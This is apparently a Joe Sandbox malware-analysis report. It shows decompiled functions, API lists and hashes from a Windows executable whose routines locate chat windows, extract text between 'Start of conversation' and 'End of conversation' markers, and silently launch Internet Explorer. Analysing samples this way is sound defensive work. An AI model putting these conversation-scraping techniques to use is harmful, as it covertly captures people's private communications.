    				_push( *((intOrPtr*)(_t89 + 4)) + _t93 + 0x804);
    				_push( *( *(_t95 + 0x10)));
    				_push( *_t63);
    				_push("<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href=\"%s\" title=\"%s\">%s</A></P>");
    				_push(_t95 - 0x14);
    				L0043E174();
    				 *(_t95 - 4) = 5;
    				L0043DD36();
    				 *(_t95 - 4) = 2;
    				L0043DD36();
    				_push(_t95 - 0x14);
    				L0043DD3C();
    				 *(_t95 - 0x1c) = _t68;
    				 *(_t95 - 4) = _t68;
    				L0043DD36();
    				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
    				return  *((intOrPtr*)(_t95 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00429925
    • #540.MFC42(?,000007E4,00000000), ref: 00429937
    • #540.MFC42(?,000007E4,00000000), ref: 00429945
    • #6673.MFC42(00000000,?,000007E4,00000000), ref: 00429963
      • Part of subcall function 004290DB: GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
      • Part of subcall function 004290DB: #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107
      • Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
      • Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
      • Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0
    • #2818.MFC42(00000001,%s, %s,00000000,00000001,00000000,?,000007E4,00000000), ref: 004299A0
    • #800.MFC42(?,?,?,?,00000000,?,000007E4,00000000), ref: 004299AF
    • #800.MFC42(?,?,?,?,00000000,?,000007E4,00000000), ref: 004299BB
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #2818.MFC42(?,<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href="%s" title="%s">%s</A></P>,00000000,00000001,-000007FF,00000009,00000001,00000009), ref: 00429A0D
    • #800.MFC42 ref: 00429A1C
    • #800.MFC42 ref: 00429A28
    • #535.MFC42(?), ref: 00429A34
    • #800.MFC42(?), ref: 00429A42
    • #800.MFC42(?), ref: 00429A4E
    Strings
    • <H2>%s %s</H2><H3>%s</H3><P><A target=_blank href="%s" title="%s">%s</A></P>, xrefs: 00429A07
    • %s, %s, xrefs: 0042999A
    • K0D, xrefs: 00429920
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537$#2818#540Format$#1168#535#6673BuffCharDateH_prologLoadStringTimeUpper
    • String ID: %s, %s$<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href="%s" title="%s">%s</A></P>$K0D
    • API String ID: 233094147-310780555
    • Opcode ID: 6a82cd9536980773b2d7847f9c8f5e9db139ad7c6efe8067013acb1c0a22f0fc
    • Instruction ID: f8bb55adfb7051356685040e1f82e5c9bf6c764db956d224435fdf9f315a5327
    • Opcode Fuzzy Hash: 6a82cd9536980773b2d7847f9c8f5e9db139ad7c6efe8067013acb1c0a22f0fc
    • Instruction Fuzzy Hash: 4A4161B2C0014DEBDF01DFA5C941AEEBB78EF19318F14845EE515A7282D7789B08CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040AA94(void* __eflags) {
    				struct HWND__* _t35;
    				struct HWND__* _t36;
    				struct HWND__* _t39;
    				CHAR* _t58;
    				void* _t64;
    
    				E0043E4E0(0x43fb6f, _t64);
    				 *((intOrPtr*)(_t64 - 0x18)) = 0;
    				if(E0040FF68( *((intOrPtr*)(_t64 + 0xc)), 0, "TPanel", 0, "TPageControlEx", 0) != 0) {
    					_t58 = "TTabSheet";
    					_t35 = E0040FF68(_t34, 0, "TPageControlEx", 0, _t58, 0);
    					 *(_t64 - 0x1c) = _t35;
    					if(_t35 != 0) {
    						L0043DDD8();
    						 *((intOrPtr*)(_t64 - 4)) = 1;
    						 *(_t64 - 0x10) = 0;
    						while(1) {
    							_t36 = FindWindowExA( *(_t64 - 0x1c),  *(_t64 - 0x10), _t58, 0);
    							 *(_t64 - 0x10) = _t36;
    							if(_t36 == 0) {
    								break;
    							}
    							L0043DDD8();
    							 *((char*)(_t64 - 4)) = 2;
    							_t39 = FindWindowExA( *(_t64 - 0x10), 0, "TRichView", 0);
    							 *(_t64 - 0x20) = _t39;
    							if(IsWindowVisible(_t39) != 0) {
    								_push( *(_t64 - 0x20));
    								_push( *((intOrPtr*)(_t64 + 8)));
    								E0040FEA7();
    								 *((intOrPtr*)(_t64 - 0x18)) = 1;
    								 *((char*)(_t64 - 4)) = 1;
    								L0043DD36();
    							} else {
    								 *((char*)(_t64 - 4)) = 1;
    								L0043DD36();
    								continue;
    							}
    							L10:
    							 *((char*)(_t64 - 4)) = 0;
    							L0043DD36();
    							goto L11;
    						}
    						_push(_t64 + 0xc);
    						L0043DD3C();
    						 *((intOrPtr*)(_t64 - 0x18)) = 1;
    						goto L10;
    					} else {
    						_push(0x4550cc);
    						L0043DE26();
    					}
    				} else {
    					_push(0x4550cc);
    					L0043DE26();
    				}
    				L11:
    				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
    				return  *((intOrPtr*)(_t64 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040AA99
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90
    • #537.MFC42(004550CC), ref: 0040AACE
    • #537.MFC42(004550CC), ref: 0040AAFA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537FindWindow$H_prolog
    • String ID: TPageControlEx$TPanel$TRichView$TTabSheet
    • API String ID: 2495091285-762916412
    • Opcode ID: 5703e4aa9909e3188e7c7995e9d98b60ae9bde4a09170edef4a87def2a394ea7
    • Instruction ID: 7daf1b419306ae0afb1a7ec3c3defd097d2df8c4cddd0e586c7c6b1396e9f578
    • Opcode Fuzzy Hash: 5703e4aa9909e3188e7c7995e9d98b60ae9bde4a09170edef4a87def2a394ea7
    • Instruction Fuzzy Hash: 093153B0D00209AACF10EFA5DC81AEEBB78EF19359F10442FF405A6281D77C5E44C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E00426AFE(void* __ecx) {
    				long _t35;
    				long _t47;
    				intOrPtr* _t49;
    				void* _t60;
    				void* _t62;
    
    				E0043E4E0(0x442c08, _t62);
    				_t60 = __ecx;
    				if(RegOpenKeyA(0x80000000, "CLSID\\{0002DF01-0000-0000-C000-000000000046}\\LocalServer32", _t62 - 0x10) == 0) {
    					 *(_t62 - 0x14) = 0x104;
    					_t35 = RegQueryValueA( *(_t62 - 0x10), 0, _t62 - 0x174, _t62 - 0x14);
    					_push( *(_t62 - 0x10));
    					__eflags = _t35;
    					if(_t35 == 0) {
    						RegCloseKey();
    						lstrcpyA(_t62 - 0x37c, _t62 - 0x174);
    						lstrcatA(_t62 - 0x37c, " about:blank");
    						memset(_t62 - 0x70, 0, 0x44);
    						 *(_t62 - 0x70) = 0x44;
    						 *((short*)(_t62 - 0x40)) = 0;
    						 *((intOrPtr*)(_t62 - 0x44)) = 1;
    						_t47 = CreateProcessA(0, _t62 - 0x37c, 0, 0, 0, 0, 0, 0, _t62 - 0x70, _t62 - 0x2c);
    						__eflags = _t47;
    						if(__eflags != 0) {
    							 *((char*)(_t60 + 0x1a19)) = 1;
    							 *((intOrPtr*)(_t60 + 0x2734)) =  *((intOrPtr*)(_t62 - 0x24));
    							_t49 = _t62 - 0x1c;
    							_push(_t49);
    							L0043E162();
    							_push("pk.bin");
    							 *((intOrPtr*)(_t60 + 0x17d8)) =  *_t49;
    							_push(0x4558c8);
    							_push(_t62 - 0x18);
    							L0043DE20();
    							 *(_t62 - 4) = 0;
    							_t47 = E0040BC5C(_t60 + 0x16b8, __eflags,  *((intOrPtr*)(_t62 - 0x18)));
    							_t25 = _t62 - 4;
    							 *_t25 =  *(_t62 - 4) | 0xffffffff;
    							__eflags =  *_t25;
    							L0043DD36();
    						} else {
    							goto L5;
    						}
    					} else {
    						_t47 = RegCloseKey();
    						L5:
    						 *0x4558e8 = 0;
    					}
    				} else {
    					 *0x4558e8 =  *0x4558e8 & 0x00000000;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
    				return _t47;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00426B03
    • RegOpenKeyA.ADVAPI32(80000000,CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32,?), ref: 00426B20
    • RegQueryValueA.ADVAPI32(?,00000000,?,?), ref: 00426B4E
    • RegCloseKey.ADVAPI32(?), ref: 00426B5B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CloseH_prologOpenQueryValue
    • String ID: about:blank$CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32$D$pk.bin
    • API String ID: 1233982722-1282806162
    • Opcode ID: 525be468897c903c59db88c317424d1505ba80cf9d1b3849818ab8045eea079e
    • Instruction ID: 716bd6f49e76ca3325759ad5cd35cb476e0685c08d7650bbd61416e5c304f96a
    • Opcode Fuzzy Hash: 525be468897c903c59db88c317424d1505ba80cf9d1b3849818ab8045eea079e
    • Instruction Fuzzy Hash: 59318DB1900618ABDB20DFA1DC49BEFBBBCFB89305F10002AE515E2150E7795A48CF28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0040A012(intOrPtr __ecx) {
    				void* _t35;
    				void* _t38;
    				intOrPtr _t59;
    				void* _t61;
    				void* _t62;
    
    				E0043E4E0(0x43f9c0, _t62);
    				_push(__ecx);
    				_push(__ecx);
    				_t59 = __ecx;
    				 *((intOrPtr*)(_t62 - 0x14)) = 0;
    				if( *((intOrPtr*)(__ecx + 0xc)) == 0 ||  *((intOrPtr*)(__ecx + 0x10)) == 0) {
    					_push(0x4550cc);
    					L0043DE26();
    				} else {
    					_t35 = E0040A178(_t59, _t62 + 0xc, FindWindowExA( *(_t62 + 0xc), 0, "DirectUIHWND", 0));
    					_push(" End of conversation");
    					 *(_t62 - 4) = 0;
    					L0043DFD6();
    					_push("Start of conversation");
    					_t61 = _t35;
    					L0043DFD6();
    					if(_t61 != 0xffffffff) {
    						_push(_t35 + 0x16);
    						_push(_t62 - 0x10);
    						L0043DFB2();
    						_t38 = _t62 - 0x14;
    						_push(_t61);
    						_push(_t38);
    						 *(_t62 - 4) = 1;
    						L0043DFD0();
    						_push(_t38);
    						 *(_t62 - 4) = 2;
    						L0043DE1A();
    						 *(_t62 - 4) = 1;
    						L0043DD36();
    						_push(_t62 - 0x10);
    						L0043DD3C();
    						 *(_t62 - 4) = 0;
    						L0043DD36();
    					} else {
    						_push(_t62 + 0xc);
    						L0043DD3C();
    					}
    					 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
    				return  *((intOrPtr*)(_t62 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040A017
    • FindWindowExA.USER32 ref: 0040A043
      • Part of subcall function 0040A178: __EH_prolog.LIBCMT ref: 0040A17D
      • Part of subcall function 0040A178: #537.MFC42(004550CC,?,?,00000000), ref: 0040A1CC
      • Part of subcall function 0040A178: #537.MFC42(004550CC,?,?,00000000), ref: 0040A1EC
      • Part of subcall function 0040A178: #800.MFC42(004550CC,?,?,00000000), ref: 0040A34A
    • #2764.MFC42( End of conversation,?,00000000), ref: 0040A060
    • #2764.MFC42(Start of conversation, End of conversation,?,00000000), ref: 0040A06F
    • #535.MFC42(?,Start of conversation, End of conversation,?,00000000), ref: 0040A080
    • #4277.MFC42(?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A092
    • #4129.MFC42(?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0A3
    • #939.MFC42(00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0B0
    • #800.MFC42(00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0BC
    • #535.MFC42(?,00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0C8
    • #800.MFC42(?,00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0D3
    • #800.MFC42(?,00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0DF
    • #537.MFC42(004550CC), ref: 0040A0EE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537$#2764#535H_prolog$#4129#4277#939FindWindow
    • String ID: End of conversation$DirectUIHWND$Start of conversation
    • API String ID: 1627553073-1357077119
    • Opcode ID: 023599eb2e0bd5fe7af2846cf7c612bb523f2f85926112e2c3288da98f08f03d
    • Instruction ID: 1e1602f22ff40642f5431aac3e1f74c10c0d3f201623bf239baed196fa13c1a4
    • Opcode Fuzzy Hash: 023599eb2e0bd5fe7af2846cf7c612bb523f2f85926112e2c3288da98f08f03d
    • Instruction Fuzzy Hash: 03215271900208FBCB14EFA5D881AEEB768AF18358F10951FF82667181DB789B08C765
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E004196F5(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    APIs
    • #537.MFC42(None,004196F0), ref: 004196FF
    • #537.MFC42(User defined,None,004196F0), ref: 0041970E
    • #537.MFC42(Open,User defined,None,004196F0), ref: 0041971D
    • #537.MFC42(Print,Open,User defined,None,004196F0), ref: 0041972C
    • #537.MFC42(Explore,Print,Open,User defined,None,004196F0), ref: 0041973B
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,004196F0), ref: 0041974A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: TE$$TE$(TE$,TE$E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-134244681
    • Opcode ID: 66357b02ccce549f61fb2f24690c4701eddd7a7f3a63d581e5c14dd0e385a72d
    • Instruction ID: 0cbec859e043791c651e77f1f34d7abc853e4eae3fc06a0a1311bf9740f4d484
    • Opcode Fuzzy Hash: 66357b02ccce549f61fb2f24690c4701eddd7a7f3a63d581e5c14dd0e385a72d
    • Instruction Fuzzy Hash: 04D0AC00F50E505149187E65F83373D5842C7DD7CBB50A16F7D121E1D38D4C4A5C452D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0041F818(void* __ecx, void* __edx) {
    				int _t38;
    				long _t41;
    				intOrPtr _t47;
    				struct HINSTANCE__* _t54;
    				intOrPtr _t56;
    				int _t57;
    				intOrPtr* _t70;
    				void* _t73;
    				void* _t75;
    				void* _t77;
    				void* _t78;
    
    				E0043E4E0(0x441da4, _t75);
    				_t78 = _t77 - 0xc;
    				_t73 = __ecx;
    				L0043DDD8();
    				 *(_t75 - 4) = 0;
    				L0043DDD8();
    				 *(_t75 - 4) = 1;
    				SendMessageA( *( *((intOrPtr*)(__ecx + 0x98)) + 0x20), 0x1009, 0, 0);
    				_t70 = ImageList_GetImageCount;
    				_t38 = ImageList_GetImageCount( *(_t73 + 0x94));
    				if(_t38 <= 0) {
    					L3:
    					E0041FAB9(0x4554a0, 0, 0xffffffff);
    					_t13 = _t75 - 0x14; // 0x419
    					_push(0x42d);
    					L0043E2E2();
    					_t41 = LoadLibraryA( *(_t75 - 0x14));
    					_t54 = _t41;
    					if(_t54 == 0) {
    						L8:
    						 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
    						L0043DD36();
    						 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
    						L0043DD36();
    						 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
    						return _t41;
    					}
    					EnumResourceNamesA(_t54, 0xe, E0041F501, _t73 + 0x90);
    					FreeLibrary(_t54);
    					_push( *(_t73 + 0x94));
    					_t56 = 0;
    					if( *_t70() <= 0) {
    						L6:
    						_t41 = SendMessageA( *( *((intOrPtr*)(_t73 + 0x98)) + 0x20), 0x1004, 0, 0);
    						if(_t41 != 0) {
    							_push(3);
    							_push(3);
    							_push(0);
    							L0043E3BA();
    						}
    						goto L8;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t17 = _t56 + 1; // 0x1
    						_t47 = _t17;
    						 *((intOrPtr*)(_t75 - 0x18)) = _t47;
    						_t19 = _t75 - 0x10; // 0x41d
    						L0043E174();
    						_t78 = _t78 + 0xc;
    						L0043DF88();
    						_t56 =  *((intOrPtr*)(_t75 - 0x18));
    						 *_t70( *(_t73 + 0x94), 3, _t56,  *((intOrPtr*)(_t75 - 0x10)), 0, 0, _t56, 0, _t19, 0x4532c8, _t47);
    					} while (_t56 < 0);
    					goto L6;
    				}
    				_t8 = _t38 - 1; // -1
    				_t57 = _t8;
    				 *((intOrPtr*)(_t75 - 0x18)) = _t38;
    				do {
    					ImageList_Remove( *(_t73 + 0x94), _t57);
    					_t57 = _t57 - 1;
    					_t11 = _t75 - 0x18;
    					 *_t11 =  *((intOrPtr*)(_t75 - 0x18)) - 1;
    				} while ( *_t11 != 0);
    				goto L3;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041F81D
    • #540.MFC42(7741B980,?,?), ref: 0041F82D
    • #540.MFC42(7741B980,?,?), ref: 0041F83A
    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0041F853
    • ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F865
    • ImageList_Remove.COMCTL32(?,-00000001,?,?), ref: 0041F878
    • #3097.MFC42(0000042D,00000419,?,?), ref: 0041F89D
    • LoadLibraryA.KERNEL32(?,0000042D,00000419,?,?), ref: 0041F8A5
    • EnumResourceNamesA.KERNEL32 ref: 0041F8C4
    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0041F8CB
    • ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F8D9
    • #2818.MFC42(0000041D,004532C8,00000001,?,?), ref: 0041F8EF
    • #3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F909
    • ImageList_GetImageCount.COMCTL32(?,00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F917
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F92F
    • #6905.MFC42(00000000,00000003,00000003,?,?), ref: 0041F945
    • #800.MFC42(?,?), ref: 0041F951
    • #800.MFC42(?,?), ref: 0041F95D
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Image$List_$Count$#540#800LibraryMessageSend$#2818#3097#3998#6905EnumFreeH_prologLoadNamesRemoveResource
    • String ID:
    • API String ID: 645711819-0
    • Opcode ID: 89d81a815a518c5910fccd5ed1f3c1e0cf7e1cd9a2264864083e33c37371d238
    • Instruction ID: 553764608f11a75eef87a8837ecdba7271e4b71b3464afb6f8dfa76467da2288
    • Opcode Fuzzy Hash: 89d81a815a518c5910fccd5ed1f3c1e0cf7e1cd9a2264864083e33c37371d238
    • Instruction Fuzzy Hash: 914182B5A00205AFDB11ABB1DD86FFE7778EF48344F10053AF61AA22D2DB745D458B24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 49%
    			E0041A5AD(void* __ecx, void* __ebp) {
    				signed int _v68;
    				signed int _v76;
    				char _v80;
    				void* _v88;
    				intOrPtr _v104;
    				void* __esi;
    				void* _t25;
    				long _t37;
    				intOrPtr _t41;
    				void* _t80;
    				intOrPtr _t81;
    				void* _t83;
    
    				_t83 = __ebp;
    				_t25 = E0043E4E0(0x4413dc, __ebp);
    				_push(__ecx);
    				_push(_t83);
    				_t80 = __ecx;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(0x3e8);
    				L00404F47(_t25, __ecx + 0x28c, __ecx);
    				_push(0);
    				_push(( *(_t80 + 0x288))[0x40]);
    				_push(0x42e);
    				L0043E2E8();
    				_push( &(( *(_t80 + 0x288))[1]));
    				_push(0x42d);
    				L0043E06C();
    				_push( &(( *(_t80 + 0x288))[0x1a]));
    				_push(0x42f);
    				L0043E06C();
    				_push( &(( *(_t80 + 0x288))[0x26]));
    				_push(0x430);
    				L0043E06C();
    				_push( &(( *(_t80 + 0x288))[0x33]));
    				_push(0x432);
    				L0043E06C();
    				_push(0x44a);
    				L0043E066();
    				_t37 = SendMessageA(( *(_t80 + 0x288))[8], 0x14e,  *( *(_t80 + 0x288)), 0);
    				_push(0x430);
    				L0043E066();
    				SendMessageA( *(_t37 + 0x20), 0xcc, 0x2a, 0);
    				if(( *(_t80 + 0x288))[0x33] == 0) {
    					_push( *((intOrPtr*)(E00429029( &_v80, 0xe025))));
    					_v68 = _v68 & 0x00000000;
    					_push(0x432);
    					L0043E066();
    					L0043E15C();
    					_v76 = _v76 | 0xffffffff;
    					L0043DD36();
    				}
    				_t76 = _t80 + 0x174;
    				E0040CF63(_t80 + 0x174, 0x323232, 1);
    				if(_t80 != 0) {
    					_t41 =  *((intOrPtr*)(_t80 + 0x20));
    				} else {
    					_t41 = 0;
    				}
    				E0040CF2E(_t76, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t41);
    				_t77 = _t80 + 0x60;
    				E0040CF63(_t80 + 0x60, 0x323232, 1);
    				if(_t80 != 0) {
    					_t81 =  *((intOrPtr*)(_t80 + 0x20));
    				} else {
    					_t81 = 0;
    				}
    				E0040CF2E(_t77, 1, 0x4550cc, 0, 0, 0, 0x5a8, _t81);
    				 *[fs:0x0] = _v104;
    				return 0;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041A5B2
    • #4710.MFC42 ref: 0041A5BE
    • #5951.MFC42(0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A5FA
    • #5953.MFC42(0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A610
    • #5953.MFC42(0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A626
    • #5953.MFC42(00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A63F
    • #5953.MFC42(00000432,?,00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A659
    • #3092.MFC42(0000044A,00000432,?,00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080), ref: 0041A66D
    • SendMessageA.USER32(?,0000014E,?,00000000), ref: 0041A683
    • #3092.MFC42(00000430,?,00000000,0000044A,00000432,?,00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000), ref: 0041A688
    • SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041A695
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #3092.MFC42(00000432,00000000), ref: 0041A6C5
    • #6199.MFC42(00000432,00000000), ref: 0041A6CC
    • #800.MFC42(00000432,00000000), ref: 0041A6DA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5953$#3092$MessageSend$#1168#4710#537#5951#6199#800H_prologLoadString
    • String ID: 222
    • API String ID: 228317318-4245286173
    • Opcode ID: 440cf8652119af8dd790a6132a813aa16af4df44761e9812e4acfba998555b14
    • Instruction ID: 759ecd59eee1237085b63a1ab2b0d48173b285e401b441356b5d19800c0247d0
    • Opcode Fuzzy Hash: 440cf8652119af8dd790a6132a813aa16af4df44761e9812e4acfba998555b14
    • Instruction Fuzzy Hash: 4B411D71341310BBE624A722CC46FBB7699EB48B14F40051DF655AB2D1DEF96C408759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0040EDEF(void* __ecx) {
    				signed int _t47;
    				long _t50;
    				intOrPtr* _t51;
    				void* _t52;
    				long _t53;
    				signed int _t54;
    				signed int _t55;
    				signed int _t56;
    				void* _t87;
    				void* _t89;
    
    				_t47 = E0043E4E0(0x44023c, _t89);
    				_t87 = __ecx;
    				_push(1);
    				L0043E08A();
    				if(_t47 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x64)) + 0x68c)) =  *((intOrPtr*)(__ecx + 0x268));
    					E004285DB( *((intOrPtr*)(__ecx + 0x64)),  *((intOrPtr*)(__ecx + 0x60)));
    					_t50 = SendMessageA( *(__ecx + 0x248), 0x1004, 0, 0);
    					 *(_t89 - 0x18) = _t50;
    					 *((intOrPtr*)(_t89 - 0x10)) = 0;
    					if(_t50 > 0) {
    						do {
    							_push(0);
    							_push( *((intOrPtr*)(_t89 - 0x10)));
    							_push(_t89 - 0x14);
    							L0043E25E();
    							 *(_t89 - 4) = 0;
    							E00428515( *((intOrPtr*)(_t87 + 0x60)),  *((intOrPtr*)(_t89 - 0x14)));
